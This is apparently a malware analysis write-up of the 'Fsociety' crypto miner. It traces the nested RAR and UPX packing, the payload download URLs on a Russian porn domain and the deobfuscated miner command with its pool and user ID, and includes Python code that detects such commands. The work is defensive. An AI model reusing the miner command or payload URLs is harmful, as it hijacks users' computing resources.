To Kill The Mocking Porn - Fsociety Crypto Miner

Tags: malware analysis, fsociety, crypto miner
Fsociety is a crypto miner that hides behind multiple layers of obfuscation, Russian porn sites, and trickery.
Filename: fsociety_soft.exe
MD5: dfafd55bc9a0e84eafada04a5f21aead

INTRODUCTION

Fsociety_soft.exe is either paying homage to Fsociety from the TV show Mr. Robot, or posing as some kind of legitimate fanboy application; regardless, the application is certainly dangerous. 

ANALYSIS

We begin by extracting the main executable, which is a self-extracting RAR archive. The extracted file is named WINDOWS.exe and is itself another self-extracting RAR archive (RAR-ception).

The file extracted from the second archive is also named WINDOWS.exe and is UPX packed. A quick unpacking of this file reveals the final launcher and its embedded AutoIt3 script.


Once running, WINDOWS.exe connects to iplogger.com. If a connection cannot be made, the program exits. This is most likely an anti-analysis connectivity check, and it is easily bypassed by setting up rules to pass traffic to the domain, or simply by responding with what the malware expects from the site.
Once connectivity is confirmed, WINDOWS.exe connects to the following .RU domain and downloads additional files:

http://porntovirt.ru/075/Security.exe
http://porntovirt.ru/075/system.exe
http://porntovirt.ru/075/1.bat

At the time of this analysis the only file hosted on the domain was 1.bat; the other two files did not exist.



Performing a directory traversal back to the main page, we are greeted with the following (blurred for the article):

Clicking the button at the bottom of the page, we are greeted with the following (blurred for the article):



Again, clicking the button brings us to the final location, which is a redirect to a Google Drive file that no longer exists. This could be the remnant of a past campaign that hosted a malicious file there.




Porn site detour aside, 1.bat is a highly obfuscated batch file which is responsible for launching the crypto mining software.


Deobfuscating this VERY long script essentially boils down to the following command:

C:\ProgramData\System32\system.exe -o stratum+tcp://xmr.pool.minergate.com:45560 --donate-level=1 -u lemoh4uk.sagmail.com -p x -t 2 -k

This launches two instances of the mining software (the command is repeated) and connects to the MINERGATE bitcoin mining pool. The -u argument carries the USERID of the individual to whom the mined bitcoin will be distributed: lemoh4uk.sagmail.com.
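As an added detection example (not code from the original analysis), the following Python parses process command lines for stratum pool-miner invocations like the one recovered from 1.bat, pulling out the pool host, port, user ID and thread count, and flagging the fake System32 directory; it also handles the `--url=` long-option form that other miners use. The sample command lines are constructed for the example.

```python
import shlex
from urllib.parse import urlsplit

# Stratum URL schemes used by common pool miners; the sample uses stratum+tcp.
STRATUM_SCHEMES = {"stratum+tcp", "stratum+ssl", "stratum+tls"}
# Short and long forms of the miner options we extract (xmrig/MinerGate style).
FLAGS = {"-o": "url", "--url": "url", "-u": "user", "--user": "user",
         "-p": "password", "--pass": "password", "-t": "threads", "--threads": "threads"}

# Constructed sample of process-creation command lines (not real telemetry).
# The first is the command deobfuscated from 1.bat; the others are benign/alternate forms.
SAMPLE_CMDLINES = [
    r"C:\ProgramData\System32\system.exe -o stratum+tcp://xmr.pool.minergate.com:45560 "
    r"--donate-level=1 -u lemoh4uk.sagmail.com -p x -t 2 -k",
    r"C:\Windows\System32\svchost.exe -k netsvcs -p",            # legit use of -p, no pool URL
    r"C:\Tools\miner.exe --url=stratum+ssl://pool.example.invalid:443 --user=wallet123",
]


def parse_miner_cmdline(cmdline):
    """Return pool/user details if the command line is a stratum miner invocation, else None."""
    try:
        argv = shlex.split(cmdline, posix=False)  # posix=False keeps Windows backslashes intact
    except ValueError:
        return None
    opts, i = {}, 1
    while i < len(argv):
        tok, val = argv[i], None
        if tok.startswith("--") and "=" in tok:       # --url=stratum+... form
            tok, val = tok.split("=", 1)
        elif tok in FLAGS and i + 1 < len(argv):      # -o stratum+... form
            val, i = argv[i + 1], i + 1
        if tok in FLAGS and val is not None:
            opts[FLAGS[tok]] = val
        i += 1
    url = urlsplit(opts.get("url", ""))
    if url.scheme not in STRATUM_SCHEMES or not url.hostname:
        return None                                    # the rule keys on the pool URL, not on flags alone
    try:
        port = url.port
    except ValueError:                                 # malformed port in the URL
        port = None
    exe = argv[0]
    exe_dir = exe.lower().replace("/", "\\").rsplit("\\", 1)[0]
    return {"exe": exe, "pool_host": url.hostname, "pool_port": port,
            "user": opts.get("user"),
            "threads": int(opts["threads"]) if opts.get("threads", "").isdigit() else None,
            # C:\ProgramData\System32 mimics the real System32; a System32 dir outside \Windows\ is a red flag
            "lookalike_system32": exe_dir.endswith("\\system32") and "\\windows\\" not in exe_dir}


def scan_cmdlines(cmdlines):
    """Run the parser over a list of process command lines and return the hits."""
    return [hit for hit in map(parse_miner_cmdline, cmdlines) if hit]
```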

When running at full capacity, the two mining programs will take up significant system resources as indicated by this graph immediately after infection:




DETECTION

There are many VirusTotal results for the later stages of this file (after the archive is extracted and payload is unpacked from UPX). The best mitigation for the early stages of this malware is to disallow self-extracting RAR files and quarantine anything UPX packed. There's no reason to have it in a business environment.

CONCLUSION

Fsociety is a crypto miner that hides behind multiple layers of obfuscation, porn sites, and trickery. The initial stages of obfuscation (the self-extracting RAR archives and UPX packing) should be blocked by most businesses, and be sure to check AlienVault's IOCs for additional blocking.